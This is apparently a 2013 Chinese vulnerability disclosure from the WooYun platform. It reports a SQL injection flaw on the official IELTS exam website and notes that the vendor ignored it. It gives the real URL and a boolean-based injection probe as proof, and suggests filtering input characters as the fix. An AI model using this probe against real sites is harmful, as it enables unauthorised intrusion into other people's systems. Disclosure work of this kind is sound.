漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2013-05-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-06-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
明天准备考雅思,就在考试前来发一则IELTS 雅思考试官方网站存在注入漏洞吧。。并求保佑明天考到好成绩。。
详细说明:
IELTS 雅思考试官方网站存在注入漏洞
http://ielts.etest.edu.cn/cn/?DocName=News20121214c&__id=AppMain.dsaNews.ShowNews
输入http://ielts.etest.edu.cn/cn/?DocName=News20121214c' and '1'='1&__id=AppMain.dsaNews.ShowNews
就能显示
输入http://ielts.etest.edu.cn/cn/?DocName=News20121214c' and '1'='2&__id=AppMain.dsaNews.ShowNews
就不能显示
漏洞证明:
IELTS 雅思考试官方网站存在注入漏洞
http://ielts.etest.edu.cn/cn/?DocName=News20121214c&__id=AppMain.dsaNews.ShowNews
输入http://ielts.etest.edu.cn/cn/?DocName=News20121214c' and '1'='1&__id=AppMain.dsaNews.ShowNews
就能显示
输入http://ielts.etest.edu.cn/cn/?DocName=News20121214c' and '1'='2&__id=AppMain.dsaNews.ShowNews
就不能显示
修复方案:
过滤掉敏感字符。。你们懂的
版权声明:转载请注明来源 季煜熙@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝